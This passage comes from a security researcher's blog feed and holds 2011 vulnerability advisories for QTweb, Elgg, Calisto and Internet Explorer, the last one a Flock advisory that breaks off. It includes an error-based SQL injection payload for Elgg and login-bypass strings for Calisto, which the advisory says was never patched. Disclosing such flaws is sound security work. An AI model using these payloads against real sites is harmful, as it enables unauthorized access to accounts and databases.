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'/&amp;gt;");&lt;br /&gt;
}&lt;br /&gt;
&amp;nbsp; &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;noscript&amp;gt;&amp;lt;p&amp;gt;this testcase requires JavaScript to run.&amp;lt;/p&amp;gt;&amp;lt;/noscript&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;First Click in this link ==&amp;gt; &amp;lt;a href=":#:" onClick="invokePoC();" target="_blank"&amp;gt;invoke PoC&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;and Look in result window, the address bar , don't show The url &lt;br /&gt;
and if you write any url in the address bar, the browser do not navigate to it.&lt;br /&gt;
This issue can be used to spoof sites or pishing attacks.&lt;br /&gt;
Safari 5.1 (7534.50)&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
Solution&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
No solution at this time !!!&lt;br /&gt;
&lt;br /&gt;
###############&lt;br /&gt;
Timeline&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
Discovered :Mar 30, 2011&lt;br /&gt;
Vendor Notify: Sep 28, 2011&lt;br /&gt;
Vendor response: XXXXX&lt;br /&gt;
Vendor Patch: XXXXXX&lt;br /&gt;
Public Disclosure: Oct 03, 2011&lt;br /&gt;
&lt;br /&gt;
########################## €nd ########################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente.... 
&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5419473408700392747?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/gUohxJFHMx0" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5419473408700392747?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5419473408700392747?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/gUohxJFHMx0/qtweb-internet-browser-url-weakness.html" title="QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s72-c/qt1.jpg" height="72" width="72" /><feedburner:origLink>http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEAQ3Y7cSp7ImA9WhdQFE4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-8168835925595535102</id><published>2011-08-15T21:28:00.001+02:00</published><updated>2011-08-15T21:30:42.809+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-15T21:30:42.809+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL" /><title>Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection</title><content type="html">##################################################&lt;br /&gt;
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection&lt;br /&gt;
Vendor URL: http://www.elgg.org/&lt;br /&gt;
Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html&lt;br /&gt;
Vendor notify: YES exploit available: YES&lt;br /&gt;
##################################################&lt;br /&gt;
&lt;br /&gt;
###################&lt;br /&gt;
Description By vendor&lt;br /&gt;
###################&lt;br /&gt;
&lt;br /&gt;
Elgg is an award-winning social networking engine, delivering&lt;br /&gt;
the building blocks that enable businesses, schools, universities&lt;br /&gt;
and associations to create their own fully-featured social networks&lt;br /&gt;
and applications. Organizations with networks powered by Elgg&lt;br /&gt;
include: Australian Government, British Government, Federal Canadian&lt;br /&gt;
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,&lt;br /&gt;
Johns Hopkins University and more (http://elgg.org/powering.php)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
Vulnerability Description&lt;br /&gt;
######################&lt;br /&gt;
&lt;br /&gt;
Elgg contains a flaw that may allow an attacker to carry out an&lt;br /&gt;
SQL injection attack. The issue is due to the script not properly&lt;br /&gt;
sanitizing user-supplied input to 'container_guid' and 'owner_guid'&lt;br /&gt;
variables upon submision to 'mod/search/pages/search/index.php' &lt;br /&gt;
This may allow an attacker to inject or manipulate SQL queries&lt;br /&gt;
in the backend database.&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
Versions afected&lt;br /&gt;
################&lt;br /&gt;
&lt;br /&gt;
Elgg  1.8 beta2 vulnerable &lt;br /&gt;
Elgg 1.7.10 and prior versions vulnerables&lt;br /&gt;
Elgg 1.7.11 not vulnerable&lt;br /&gt;
&lt;br /&gt;
#################&lt;br /&gt;
Tecnical details&lt;br /&gt;
#################&lt;br /&gt;
&lt;br /&gt;
Injection type is Integer and it only can be exploit via&lt;br /&gt;
Mysql error based injection method, it works with&lt;br /&gt;
'magic_quotes_gpc' set to 'on' or 'off'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
Proof Of Concept&lt;br /&gt;
######################&lt;br /&gt;
&lt;br /&gt;
If you know what is error based injection... you know how to use it ;)&lt;br /&gt;
&lt;br /&gt;
URL =&gt; http://localhost/elgg/search/?q=someword&amp;search_type=tags&amp;container_guid=7826'&lt;br /&gt;
&lt;br /&gt;
Injections:&lt;br /&gt;
&lt;br /&gt;
and(select 1 from(select count(*),concat((select (select %column_name%) from&lt;br /&gt;
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from&lt;br /&gt;
`information_schema`.tables&lt;br /&gt;
group by x)a) and 1=1&lt;br /&gt;
&lt;br /&gt;
Count(table_name) of information_schema.tables where&lt;br /&gt;
table_schema=0x74657374 is 75&lt;br /&gt;
&lt;br /&gt;
Count(column_name) of information_schema.columns where&lt;br /&gt;
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
Solution&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
The vendor has release a updated version to solve this &lt;br /&gt;
issue and others see changelog and update your Elgg &lt;br /&gt;
instalation to 1.7.11&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
###############&lt;br /&gt;
Timeline&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
Discovered :July 30, 2011&lt;br /&gt;
Vendor Notify:July 30, 2011&lt;br /&gt;
Vendor response:July 30, 2011&lt;br /&gt;
Vendor Patch: August 15, 2011&lt;br /&gt;
Public Disclosure: August 15, 2011&lt;br /&gt;
&lt;br /&gt;
########################## €nd ########################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente.... &lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-8168835925595535102?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/G27j5oA-Iec" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/8168835925595535102?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/8168835925595535102?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/G27j5oA-Iec/elgg-18-beta2-and-prior-to-1711.html" title="Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08DQnY7cSp7ImA9WhdQE0w.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-1161273385405508896</id><published>2011-08-11T23:09:00.004+02:00</published><updated>2011-08-14T13:04:33.809+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-14T13:04:33.809+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="SQL" /><title>Calisto light, light plus and full, Sql Injection And user or Admin bypass</title><content type="html">##################################################&lt;br /&gt;
Calisto light, light plus and full, Sql Injection And user or Admin bypass&lt;br /&gt;
Vendor URL: http://www.calistosoft.com.ar/&lt;br /&gt;
Advisore: http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html&lt;br /&gt;
Vendor notify: YES exploit available: YES&lt;br /&gt;
##################################################&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
##########################&lt;br /&gt;
Vulnerability Description&lt;br /&gt;
##########################&lt;br /&gt;
&lt;br /&gt;
Calisto Light, Light Plus and Full contains a flaw that may &lt;br /&gt;
allow an attacker to carry out an SQL injection attack. The&lt;br /&gt;
issue is due to the script not properly sanitizing user-supplied&lt;br /&gt;
input to 'usuario' form field and "txtEmail' param upon submision&lt;br /&gt;
to 'login.aspx' and '/admin/loginAdmin.aspx' This may allow an &lt;br /&gt;
attacker to inject or manipulate SQL queries in the backend database.&lt;br /&gt;
#################&lt;br /&gt;
UPDATE 14/08/2011&lt;br /&gt;
#################&lt;br /&gt;
&lt;br /&gt;
Detalle.aspx, Oferta.aspx, Categoria.aspx, contacto.aspx, &lt;br /&gt;
marca.aspx, novedades.aspx, empresa.aspx FAQ.aspx and Registracion.aspx&lt;br /&gt;
are afected by this flaw too.&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
Versions afected&lt;br /&gt;
################&lt;br /&gt;
&lt;br /&gt;
Calisto Light&lt;br /&gt;
Calisto Light plus&lt;br /&gt;
Calisto Full&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
Proof Of Concept&lt;br /&gt;
######################&lt;br /&gt;
&lt;br /&gt;
this issue can be used to bypass admin validation or user validation &lt;br /&gt;
&lt;br /&gt;
1- If an attacker writes in 'Usuario' box:&lt;br /&gt;
&lt;br /&gt;
someword'or'1'='1'&lt;br /&gt;
and click in login button. wen the aplication post to 'login.aspx' &lt;br /&gt;
it shows a nice SQL warning but if write:&lt;br /&gt;
&lt;br /&gt;
someword'or'1'='1'--&lt;br /&gt;
&lt;br /&gt;
it bypass validation. if anyones know a user email, then he can &lt;br /&gt;
log as this user :) &lt;br /&gt;
&lt;br /&gt;
2- If an attacker writes in 'usuario' box from admin section:&lt;br /&gt;
&lt;br /&gt;
Admin'or'1'='1'--&lt;br /&gt;
&lt;br /&gt;
And click in login button wen the aplication post to&lt;br /&gt;
'/admin/loginAdmin.aspx' it bypass Admin validation. :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
Solution&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
No solution was available at this time.&lt;br /&gt;
I have send four emails to calistosoft via his webform&lt;br /&gt;
and info and support mails to get initial contact but &lt;br /&gt;
they haven't respond :(&lt;br /&gt;
&lt;br /&gt;
###############&lt;br /&gt;
Timeline&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
Discovered :  30-07-2011&lt;br /&gt;
Vendor Notify: 7-08-2011&lt;br /&gt;
Vendor response: no response.&lt;br /&gt;
Workarround patch: no patch&lt;br /&gt;
Vendor Patch: no patch&lt;br /&gt;
Public Disclosure: 11-08-2011&lt;br /&gt;
&lt;br /&gt;
########################## €nd ########################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente.... &lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-1161273385405508896?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/YMzvVWkFdKo" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/1161273385405508896?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/1161273385405508896?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/YMzvVWkFdKo/calisto-light-light-plus-and-full-sql.html" title="Calisto light, light plus and full, Sql Injection And user or Admin bypass" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUFSHw8eip7ImA9WhdRGUw.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-7728482253340550385</id><published>2011-08-09T20:55:00.003+02:00</published><updated>2011-08-09T21:30:19.272+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-09T21:30:19.272+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Acknowledgments" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability</title><content type="html">#############################################&lt;br /&gt;
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability&lt;br /&gt;
Vendor URL: http://www.microsoft.com&lt;br /&gt;
Advisore: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html&lt;br /&gt;
Coordinate Dislcosure: YES exploit available: Private&lt;br /&gt;
CVE-2011-1257 and MS011-57&lt;br /&gt;
#############################################&lt;br /&gt;
&lt;br /&gt;
Microsoft Internet Explorer 6, 7 and 8 is prone vulnerable to a&lt;br /&gt;
Remote code execution due a race condition in window.open&lt;br /&gt;
javascript metod&lt;br /&gt;
&lt;br /&gt;
A Remote attacker can compose a web page with malicious code&lt;br /&gt;
and wen a victim visit this malformed web doc, attacker can&lt;br /&gt;
exploit this situation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
Solution&lt;br /&gt;
######################&lt;br /&gt;
&lt;br /&gt;
Microsoft has issue a bulletin class with tecnical detalis about this issue&lt;br /&gt;
with this identifier [MS011-57]&lt;br /&gt;
&lt;br /&gt;
you can found more detailed at this link:&lt;br /&gt;
http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx&lt;br /&gt;
&lt;br /&gt;
Also microsoft has issue a patch to solve this vulnerability&lt;br /&gt;
see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx&lt;br /&gt;
for update your system.&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
Timeline&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Discovered : January 13, 2011&lt;br /&gt;
Vendor Notify: January 19, 2011&lt;br /&gt;
Vendor Response: January 19, 2011&lt;br /&gt;
Vendor Patch: August 9, 2011&lt;br /&gt;
Public Disclosure: August 9, 2011&lt;br /&gt;
&lt;br /&gt;
################# €nd #########################&lt;br /&gt;
&lt;br /&gt;
Thnx to Michal Zalewski for his extraordinary mind&lt;br /&gt;
and knowledge, people like him should have a virtual&lt;br /&gt;
statue for the rest of the times&lt;br /&gt;
&lt;br /&gt;
Thnx To Jack, Gerardo, Nate and all MSRC&lt;br /&gt;
for his support in this issue.&lt;br /&gt;
&lt;br /&gt;
Thnx To Microsoft Vulnerability Research (MSVR)&lt;br /&gt;
for  interesting in this issue and for coordinate&lt;br /&gt;
Disclosure in other browsers afected.&lt;br /&gt;
&lt;br /&gt;
Thnx to All who Belive in Me include you Estrella :**&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7728482253340550385?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/MlaF-88dIaM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7728482253340550385?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7728482253340550385?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/MlaF-88dIaM/internet-explorer-6-7-and-8-windowopen.html" title="Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE4HRXczfSp7ImA9Wx9aGEU.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-5029069277080376097</id><published>2011-03-11T23:35:00.001+01:00</published><updated>2011-03-11T23:35:34.985+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-11T23:35:34.985+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="extensions" /><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Acknowledgments" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Multiple vulnerabilities in Flock Browser 3.0.0.3989</title><content type="html">#########################################&lt;br /&gt;
Multiple vulnerabilities in Flock  Browser 3.0.0.3989&lt;br /&gt;
Vendor URL: http://beta.flock.com/&lt;br /&gt;
Vendor Advisores: http://www.flock.com/security/ &lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html&lt;br /&gt;
Vendor notify:YES exploits availables:YES&lt;br /&gt;
######################################### &lt;br /&gt;
&lt;br /&gt;
Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.&lt;br /&gt;
&lt;br /&gt;
Flock is faster, simpler, and more friendly. Literally. It's the only sleek,  modern web browser with the built-in ability to keep you up-to-date with your  Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a  old chromium project (5.0.375.75) and has multiple bugs imported from chrome and  his owns bugs :)&amp;nbsp; &lt;br /&gt;
